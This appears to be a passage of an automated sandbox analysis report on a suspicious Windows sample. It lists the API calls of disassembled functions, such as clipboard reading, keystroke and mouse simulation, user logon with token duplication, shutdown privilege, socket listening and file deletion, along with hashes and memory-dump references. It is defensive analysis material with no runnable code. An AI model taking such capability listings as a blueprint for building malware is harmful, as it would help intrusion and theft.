                                    • ScreenToClient.USER32(?,?), ref: 00819B75
                                    • GetParent.USER32(?), ref: 00819B93
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00819BFA
                                    • SendMessageW.USER32 ref: 00819C2B
                                    • ClientToScreen.USER32(?,?), ref: 00819C84
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00819CB4
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00819CDE
                                    • SendMessageW.USER32 ref: 00819D01
                                    • ClientToScreen.USER32(?,?), ref: 00819D4E
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00819D82
                                      • Part of subcall function 00799944: GetWindowLongW.USER32(?,000000EB), ref: 00799952
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00819E05
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 3429851547-4164748364
                                    • Opcode ID: f68df84c33ccda4c7e1032a265617b85aa3dcf1d0034462663403fa7ae34f732
                                    • Instruction ID: 15b51b438cace61c660fc2f194be16f946433b6e36bfdca271a65cb009654ea9
                                    • Opcode Fuzzy Hash: f68df84c33ccda4c7e1032a265617b85aa3dcf1d0034462663403fa7ae34f732
                                    • Instruction Fuzzy Hash: 96428D74204201EFDB24CF64CC58AEABBE9FF99314F144A2DF699C72A1D771A890CB51
                                    APIs
                                    • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 008148F3
                                    • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00814908
                                    • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00814927
                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0081494B
                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0081495C
                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0081497B
                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 008149AE
                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 008149D4
                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00814A0F
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00814A56
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00814A7E
                                    • IsMenu.USER32(?), ref: 00814A97
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00814AF2
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00814B20
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00814B94
                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00814BE3
                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00814C82
                                    • wsprintfW.USER32 ref: 00814CAE
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00814CC9
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00814CF1
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00814D13
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00814D33
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00814D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                    • String ID: %d/%02d/%02d
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0079F998
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007DF474
                                    • IsIconic.USER32(00000000), ref: 007DF47D
                                    • ShowWindow.USER32(00000000,00000009), ref: 007DF48A
                                    • SetForegroundWindow.USER32(00000000), ref: 007DF494
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007DF4AA
                                    • GetCurrentThreadId.KERNEL32 ref: 007DF4B1
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007DF4BD
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007DF4CE
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 007DF4D6
                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 007DF4DE
                                    • SetForegroundWindow.USER32(00000000), ref: 007DF4E1
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF4F6
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF501
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF50B
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF510
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF519
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF51E
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007DF528
                                    • keybd_event.USER32(00000012,00000000), ref: 007DF52D
                                    • SetForegroundWindow.USER32(00000000), ref: 007DF530
                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 007DF557
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    APIs
                                      • Part of subcall function 007E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007E170D
                                      • Part of subcall function 007E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007E173A
                                      • Part of subcall function 007E16C3: GetLastError.KERNEL32 ref: 007E174A
                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 007E1286
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007E12A8
                                    • CloseHandle.KERNEL32(?), ref: 007E12B9
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007E12D1
                                    • GetProcessWindowStation.USER32 ref: 007E12EA
                                    • SetProcessWindowStation.USER32(00000000), ref: 007E12F4
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007E1310
                                      • Part of subcall function 007E10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007E11FC), ref: 007E10D4
                                      • Part of subcall function 007E10BF: CloseHandle.KERNEL32(?,?,007E11FC), ref: 007E10E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                    • String ID: $default$winsta0
                                    APIs
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007E1114
                                      • Part of subcall function 007E10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1120
                                      • Part of subcall function 007E10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E112F
                                      • Part of subcall function 007E10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007E0B9B,?,?,?), ref: 007E1136
                                      • Part of subcall function 007E10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007E114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007E0BCC
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007E0C00
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0C17
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 007E0C51
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007E0C6D
                                    • GetLengthSid.ADVAPI32(?), ref: 007E0C84
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007E0C8C
                                    • HeapAlloc.KERNEL32(00000000), ref: 007E0C93
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007E0CB4
                                    • CopySid.ADVAPI32(00000000), ref: 007E0CBB
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007E0CEA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007E0D0C
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007E0D1E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0D45
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D4C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0D55
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D5C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007E0D65
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D6C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 007E0D78
                                    • HeapFree.KERNEL32(00000000), ref: 007E0D7F
                                      • Part of subcall function 007E1193: GetProcessHeap.KERNEL32(00000008,007E0BB1,?,00000000,?,007E0BB1,?), ref: 007E11A1
                                      • Part of subcall function 007E1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,007E0BB1,?), ref: 007E11A8
                                      • Part of subcall function 007E1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007E0BB1,?), ref: 007E11B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    APIs
                                    • OpenClipboard.USER32(0081CC08), ref: 007FEB29
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 007FEB37
                                    • GetClipboardData.USER32(0000000D), ref: 007FEB43
                                    • CloseClipboard.USER32 ref: 007FEB4F
                                    • GlobalLock.KERNEL32(00000000), ref: 007FEB87
                                    • CloseClipboard.USER32 ref: 007FEB91
                                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007FEBBC
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 007FEBC9
                                    • GetClipboardData.USER32(00000001), ref: 007FEBD1
                                    • GlobalLock.KERNEL32(00000000), ref: 007FEBE2
                                    • GlobalUnlock.KERNEL32(00000000,?), ref: 007FEC22
                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 007FEC38
                                    • GetClipboardData.USER32(0000000F), ref: 007FEC44
                                    • GlobalLock.KERNEL32(00000000), ref: 007FEC55
                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 007FEC77
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007FEC94
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007FECD2
                                    • GlobalUnlock.KERNEL32(00000000,?,?), ref: 007FECF3
                                    • CountClipboardFormats.USER32 ref: 007FED14
                                    • CloseClipboard.USER32 ref: 007FED59
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                    • String ID:
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007F69BE
                                    • FindClose.KERNEL32(00000000), ref: 007F6A12
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007F6A4E
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007F6A75
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007F6AB2
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 007F6ADF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007F9663
                                    • GetFileAttributesW.KERNEL32(?), ref: 007F96A1
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 007F96BB
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007F96D3
                                    • FindClose.KERNEL32(00000000), ref: 007F96DE
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007F96FA
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F974A
                                    • SetCurrentDirectoryW.KERNEL32(00846B7C), ref: 007F9768
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F9772
                                    • FindClose.KERNEL32(00000000), ref: 007F977F
                                    • FindClose.KERNEL32(00000000), ref: 007F978F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007F97BE
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007F9819
                                    • FindClose.KERNEL32(00000000), ref: 007F9824
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 007F9840
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F9890
                                    • SetCurrentDirectoryW.KERNEL32(00846B7C), ref: 007F98AE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F98B8
                                    • FindClose.KERNEL32(00000000), ref: 007F98C5
                                    • FindClose.KERNEL32(00000000), ref: 007F98D5
                                      • Part of subcall function 007EDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007EDB00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 007F8257
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 007F8267
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007F8273
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007F8310
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8324
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8356
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007F838C
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8395
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local$System
                                    • String ID: *.*
                                    APIs
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                      • Part of subcall function 007EE199: GetFileAttributesW.KERNEL32(?,007ECF95), ref: 007EE19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007ED122
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 007ED1DD
                                    • MoveFileW.KERNEL32(?,?), ref: 007ED1F0
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 007ED20D
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007ED237
                                      • Part of subcall function 007ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,007ED21C,?,?), ref: 007ED2B2
                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 007ED253
                                    • FindClose.KERNEL32(00000000), ref: 007ED264
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 1946585618-1173974218
                                    APIs
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    APIs
                                      • Part of subcall function 007E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007E170D
                                      • Part of subcall function 007E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007E173A
                                      • Part of subcall function 007E16C3: GetLastError.KERNEL32 ref: 007E174A
                                    • ExitWindowsEx.USER32(?,00000000), ref: 007EE932
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $ $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-3163812486
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00801276
                                    • WSAGetLastError.WSOCK32 ref: 00801283
                                    • bind.WSOCK32(00000000,?,00000010), ref: 008012BA
                                    • WSAGetLastError.WSOCK32 ref: 008012C5
                                    • closesocket.WSOCK32(00000000), ref: 008012F4
                                    • listen.WSOCK32(00000000,00000005), ref: 00801303
                                    • WSAGetLastError.WSOCK32 ref: 0080130D
                                    • closesocket.WSOCK32(00000000), ref: 0080133C
                                    Similarity
                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                    • String ID:
                                    • API String ID: 540024437-0
                                    APIs
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                      • Part of subcall function 007EE199: GetFileAttributesW.KERNEL32(?,007ECF95), ref: 007EE19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007ED420
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 007ED470
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007ED481
                                    • FindClose.KERNEL32(00000000), ref: 007ED498
                                    • FindClose.KERNEL32(00000000), ref: 007ED4A1
                                    Similarity
                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 2649000838-1173974218
                                    APIs
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    APIs
                                    • _wcslen.LIBCMT ref: 007F64DC
                                    • CoInitialize.OLE32(00000000), ref: 007F6639
                                    • CoCreateInstance.OLE32(0081FCF8,00000000,00000001,0081FB68,?), ref: 007F6650
                                    • CoUninitialize.OLE32 ref: 007F68D4
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 886957087-24824748
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 008022E8
                                      • Part of subcall function 007FE4EC: GetWindowRect.USER32(?,?), ref: 007FE504
                                    • GetDesktopWindow.USER32 ref: 00802312
                                    • GetWindowRect.USER32(00000000), ref: 00802319
                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00802355
                                    • GetCursorPos.USER32(?), ref: 00802381
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008023DF
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                    • String ID:
                                    • API String ID: 2387181109-0
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 007F9B78
                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007F9C8B
                                      • Part of subcall function 007F3874: GetInputState.USER32 ref: 007F38CB
                                      • Part of subcall function 007F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007F3966
                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007F9BA8
                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007F9C75
                                    Similarity
                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                    • String ID: *.*
                                    • API String ID: 1972594611-438819550
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00799A4E
                                    • GetSysColor.USER32(0000000F), ref: 00799B23
                                    • SetBkColor.GDI32(?,00000000), ref: 00799B36
                                    Similarity
                                    • API ID: Color$LongProcWindow
                                    • String ID:
                                    • API String ID: 3131106179-0
                                    APIs
                                      • Part of subcall function 0080304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0080307A
                                      • Part of subcall function 0080304E: _wcslen.LIBCMT ref: 0080309B
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0080185D
                                    • WSAGetLastError.WSOCK32 ref: 00801884
                                    • bind.WSOCK32(00000000,?,00000010), ref: 008018DB
                                    • WSAGetLastError.WSOCK32 ref: 008018E6
                                    • closesocket.WSOCK32(00000000), ref: 00801915
                                    Similarity
                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 1601658205-0
                                    APIs
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0080A6AC
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0080A6BA
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0080A79C
                                    • CloseHandle.KERNEL32(00000000), ref: 0080A7AB
                                      • Part of subcall function 0079CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,007C3303,?), ref: 0079CE8A
                                    Similarity
                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                    • String ID:
                                    • API String ID: 1991900642-0
                                    • Opcode ID: 5f6451b0a32ed5177af50dc7f190ea794eadca2a8a7c32d0a875f982e08ef36b
                                    • Instruction ID: c476c8991fc75a53804077fca6139b05d7a2fa99d9ae7cd4f4d423272f48f7b1
                                    • Opcode Fuzzy Hash: 5f6451b0a32ed5177af50dc7f190ea794eadca2a8a7c32d0a875f982e08ef36b
                                    • Instruction Fuzzy Hash: 86513871548301AFD714EF24D88AA6BBBE8FF89754F00892DF585D72A1EB34D904CB92
                                    APIs
                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 007EAAAC
                                    • SetKeyboardState.USER32(00000080), ref: 007EAAC8
                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 007EAB36
                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 007EAB88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: d36aee95b12fb0b7efc67c2cdb3ce6f17a901ca138e453d9ecf81ad5e5dee46e
                                    • Instruction ID: dc6fd5a82acaf58cc27193ee95642baca881eab2ce787061f6b932fd6f34262d
                                    • Opcode Fuzzy Hash: d36aee95b12fb0b7efc67c2cdb3ce6f17a901ca138e453d9ecf81ad5e5dee46e
                                    • Instruction Fuzzy Hash: 37311EB0A41284BEFF358A66CC05BFA77ABAF5C310F04421AF181951D1D37CA945C752
                                    APIs
                                    • _free.LIBCMT ref: 007BBB7F
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • GetTimeZoneInformation.KERNEL32 ref: 007BBB91
                                    • WideCharToMultiByte.KERNEL32(00000000,?,0085121C,000000FF,?,0000003F,?,?), ref: 007BBC09
                                    • WideCharToMultiByte.KERNEL32(00000000,?,00851270,000000FF,?,0000003F,?,?,?,0085121C,000000FF,?,0000003F,?,?), ref: 007BBC36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                    • String ID:
                                    • API String ID: 806657224-0
                                    • Opcode ID: b07d34acccf668b310a0aea16e05e51b5aec1ef74148cef3e1a0524324c68686
                                    • Instruction ID: f4dc10513dd33fa82942b720f7f3e794847c43e3124480f36c07bbf3cc996751
                                    • Opcode Fuzzy Hash: b07d34acccf668b310a0aea16e05e51b5aec1ef74148cef3e1a0524324c68686
                                    • Instruction Fuzzy Hash: 7431D070944205EFCB10DF68CC84ABEBFB8FF45751B1446AAE820DB2A1D7789E40CB60
                                    APIs
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 007FCE89
                                    • GetLastError.KERNEL32(?,00000000), ref: 007FCEEA
                                    • SetEvent.KERNEL32(?,?,00000000), ref: 007FCEFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorEventFileInternetLastRead
                                    • String ID:
                                    • API String ID: 234945975-0
